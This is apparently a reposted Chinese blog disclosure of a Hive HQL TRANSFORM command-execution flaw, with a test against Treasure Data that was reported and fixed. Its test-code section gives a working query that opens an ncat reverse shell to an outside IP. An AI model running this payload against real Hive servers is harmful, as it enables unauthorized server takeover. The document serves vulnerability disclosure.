Hive任意命令/代码执行漏洞+渗透实例

最新推荐文章于 2025-08-14 16:33:49 发布
转载 最新推荐文章于 2025-08-14 16:33:49 发布 · 683 阅读 · 0

本文介绍了Hive中一种潜在的安全漏洞,通过特定的HQL语句可以利用transform功能执行外部命令,导致服务器权限被获取。文章详细展示了如何复现该漏洞,并提到了已通知受影响的大公司及具体案例。

Author: kindle
Date: 2013-02-9

Hive是建立在 Hadoop 上的数据仓库基础构架。它提供了一系列的工具,可以用来进行数据提取转化加载(ETL),这是一种可以存储、查询和分析存储在 Hadoop 中的大规模数据的机制。Hive 定义了简单的类 SQL 查询语言,称为 QL,它允许熟悉 SQL 的用户查询数据。同时,这个语言也允许熟悉 MapReduce 开发者的开发自定义的 mapper 和 reducer 来处理内建的 mapper 和 reducer 无法完成的复杂的分析工作。

漏洞详情

HQL可以通过transform自定义Hive使用的 Map/Reduce 脚本,从而调用shell/python等语言,切默认皆可用,没提供禁用方式。导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限

测试代码

新建/root/test文件,内容是1(或者任意int型数字)
创建测试表
create table if not exists kindle(id int);
导入数据(这步很关键,没数据无法触发漏洞)
load data local inpath ‘/root/test’ INTO TABLE kindle;
通过transform来自定义hive使用的shell命令,反弹shell
select transform(id) USING ‘/usr/bin/ncat -e /bin/sh ip port’ from kindle;
删除测试表
drop table kindle;

 

漏洞状态

通知了部分大公司,尚未联系官方

 

————————————————————————————-邪恶的分割线————————————————————————————-

 

实战案例

测试Treasure Data集群(Hadoop-based Big Data as a Service on the Cloud | Treasure Data)

过程

未命名

未命名

 

修复状态

已经通知Treasure Data官方,修补好了,如下图官方的回复

QQ截图20130217093153

 

从零开始搭建企业级大数据OLAP平台
AI天才研究院
08-22 1006
OLAP是一种专为支持复杂分析查询而设计的技术,它允许用户从多个维度对大量数据进行快速、灵活的查询和分析。OLAP的核心价值在于将复杂的数据关系转化为直观的业务洞察,使非技术人员也能轻松探索数据。想象一家电商企业的销售数据,如果只看总销售额这个单一指标,你只能知道"卖了多少"。但通过OLAP分析,你可以同时从时间(时维)、产品(产品维)、地区(地区维)、客户(客户维)等多个维度分析:“华东地区25-35岁女性客户在第四季度购买化妆品类产品的客单价变化趋势”。这种多维度交叉分析能力正是OLAP的核心优势。
Apache Airflow Hive Provider 任意Hive命令执行漏洞
murphysec的博客
03-01 593
Apache Airflow 是一个以编程方式管理 workflow 的平台,Airflow Hive Provider 是一个使用 SQL 进行读取、写入和管理分布式存储中的大型数据集的工具包,_prepare_cli_cmd 方法用于创建 Hive 连接命令列表。 由于 Airflow Hive Provider 5.1.3 之前版本中的 hive#_prepare_cli_cmd 方法未对用户传入的数据库连接参数(conn)有效过滤,攻击者可以恶意构造 Hive 连接参数传递到 jdbc_url 中
第十一天任意代码执行漏洞
代码审计
03-16 1612
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞代码执行 和 命令执行 代码执行 后端语言执行 php java .net nodejs 命令执行 调用系统接口 面试喜欢问 代码执行常见的函数 代码执行各函数之间的特点 代码执行如何修复 bypass disable fu nctiO
Hive3.1.2-Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)修复方法
等风来
05-04 820
其中,log4j-api-*.jar、log4j-core-*.jar是需要替换的。
全网最全的 Cobalt Strike 使用教程-内网渗透之域控攻击篇!黑客技术零基础入门到精通教程建议收藏!
wholeliubei的博客
08-14 1394
本文介绍了攻击域控制器时提取ntds.dit文件的多种方法。ntds.dit存储了域内关键数据,但被系统锁定无法直接读取。文章详细讲解了通过ntdsutil.exe创建快照并拷贝文件、使用vssadmin/vssown.vbs工具管理卷影拷贝、利用IFM方式生成副本,以及diskshadow工具操作卷影服务等方法。这些技术需在获取域控权限后使用,文中强调该内容仅用于学习研究。通过多种技术对比,为安全研究人员提供了完整的域控数据提取方案。
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4753
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
内网渗透(windows)
qq_63980959的博客
04-05 3713
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8965
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Apache Airflow Hive Provider <5.0.0 存在操作系统命令注入漏洞
OSCS开源安全社区
12-22 565
Apache Airflow Hive Provider 在 5.0.0 之前的版本中由于对airflow/providers/apache/hive/hooks/hive.py文件中hive_cli_params参数不正确初始化,导致存在操作系统命令注入漏洞。OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。将组件 apache-airflow-providers-apache-hive 升级至 5.0.0 及以上版本。
命令执行漏洞
Jim的博客
09-29 1262
某产品巧妙的命令执行漏洞
一个码农的笔记
03-26 982
最近在做内部产品的代码审计,发现一处有趣的地方,我把关键代码提取出来,供大家学习思路 <? if(array_key_exists('type',$_REQUEST)){ $type = $_REQUEST['type']; } if(array_key_exists('sha1',$_REQUEST)){ $sha1 = $_REQUEST['sha...
Bash 远程任意代码执行安全漏洞(最严重漏洞
weixin_34221332的博客
09-25 453
Bash 远程任意代码执行安全漏洞(最严重漏洞)http://www.oschina.net/news/55576/bourne-again-shell-bash-remote-code-execution-vulnerabilityhttp://www.antiy.com/response/bash.html 转载于:https://blog.5...
漏洞预警|Apache Airflow Hive Provider命令注入漏洞
LJQClqjc的博客
11-22 883
棱镜七彩安全预警
CVE-2020-13821漏洞复现
m0_68356693的博客
04-28 1032
MQTT最大优点在于可以以极少的代码和有限的带宽,为远程连接设备提过实时可靠的消息服务,作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。当其他用户访问受到XSS攻击的网页时,这些恶意脚本代码将在他们的浏览器上执行,从而导致攻击者能够窃取用户的会话信息、篡改网页内容、重定向用户到恶意网站等恶意行为。在发送给Broker的MQTT数据包中的一个精心构造的clientid参数在管理控制台的客户端部分中被反射。较高的版本不支持我们使用的回调 API 版本。
未授权访问漏洞总结
weixin_30432179的博客
11-20 1553
前言 今年5月,比特币勒索病毒WannaCry席卷全球,国内众多机构部门计算机系统瘫痪。根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植入、勒索,尤其是Redis、MongoDB等数据库的未授权访问漏洞尤其严重。参见《【脉搏译文系列】如何高效的应对勒索软件》 0x01 介绍 未授权访问可以理解为...
orc文件导致hiveserver2的内存泄漏
wm_1002的博客
01-03 861
CDH6.0.1 hive orc导致内存增长问题解决
$HIVE_HOME/logs/查看这个的命令是什么
最新发布
09-25
<think> 根据用户问题,用户想要查看$HIVE_HOME/logs/目录的内容。由于$HIVE_HOME是一个环境变量,我们需要先确定它的具体路径,然后使用ls命令查看该目录下的文件。 步骤: 1. 确认$HIVE_HOME环境变量:可以通过`echo $HIVE_HOME`命令查看该环境变量的值。如果未设置,可能需要根据Hive的安装位置手动确定。 2. 如果环境变量已设置,则直接使用`ls`命令查看日志目录:`ls $HIVE_HOME/logs` 3. 如果环境变量未设置,可以尝试在常见的安装路径下查找,或者通过Hive的配置文件(如hive-env.sh)来定位。 根据引用[2]中的内容,HIVE_HOME可能在配置文件中被设置(例如在hive-env.sh中设置了HIVE_HOME)。另外,引用[1]提到Hive日志的位置由hive-log4j.properties中的hive.log.dir指定,但用户直接询问的是$HIVE_HOME/logs/目录。 因此,查看$HIVE_HOME/logs/目录内容的命令是: ```bash ls $HIVE_HOME/logs ``` 注意:如果环境变量$HIVE_HOME未设置,则需要先设置它。可以通过以下方式之一: - 临时设置:在终端中执行`export HIVE_HOME=/path/to/hive`(路径根据实际安装位置) - 永久设置:编辑~/.bashrc或/etc/profile文件,添加`export HIVE_HOME=/path/to/hive`,然后执行`source ~/.bashrc`(或`source /etc/profile`) 如果用户不知道Hive的安装路径,可以通过以下方式查找: 1. 查找hive命令所在位置:`which hive`,然后根据返回的路径(例如/opt/modules/hive-0.13.1/bin/hive),那么HIVE_HOME可能是/opt/modules/hive-0.13.1。 2. 或者使用`find / -name "hive-env.sh" 2>/dev/null`命令查找配置文件,然后根据配置文件的位置推断HIVE_HOME。 综上所述,最直接的命令是: ```bash ls $HIVE_HOME/logs ``` 相关问题: 1. 如果$HIVE_HOME未设置,如何确定Hive的安装路径? 2. 如何查看Hive日志文件的内容? 3. 如何配置Hive的日志输出级别? </think> 要查看 `$HIVE_HOME/logs/` 目录的内容,请使用以下 Linux 命令: ```bash # 1. 确认 HIVE_HOME 环境变量是否已设置 echo $HIVE_HOME # 2. 列出日志目录内容 ls -l $HIVE_HOME/logs/ ``` ### 关键说明: 1. **环境变量检查**: `echo $HIVE_HOME` 用于验证环境变量是否已正确配置。如果返回空值,说明需要先配置环境变量(参考引用[3]中配置方法)[^3]。 2. **日志目录内容**: `ls -l $HIVE_HOME/logs/` 会显示日志目录下所有文件的详细信息,包括: - 文件名(如 `hive.log`,参考引用[1])[^1] - 文件大小 - 修改时间 - 权限信息 ### 操作示例: ```bash # 假设 HIVE_HOME 已设置为 /opt/modules/hive-0.13.1 $ ls -l /opt/modules/hive-0.13.1/logs/ total 1024 -rw-r--r-- 1 hive hive 12345 Jun 10 10:30 hive.log -rw-r--r-- 1 hive hive 56789 Jun 10 09:15 hive-error.log -rw-r--r-- 1 hive hive 1024 Jun 9 14:20 hiveserver2.log ``` ### 可能出现的问题: - 若提示 `No such file or directory`: 1. 检查 HIVE_HOME 是否正确设置:`echo $HIVE_HOME` 2. 检查路径是否存在:`ls $HIVE_HOME` 3. 确认日志目录位置(有些配置可能在 `$HIVE_CONF_DIR/logs`,参考引用[2])[^2]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值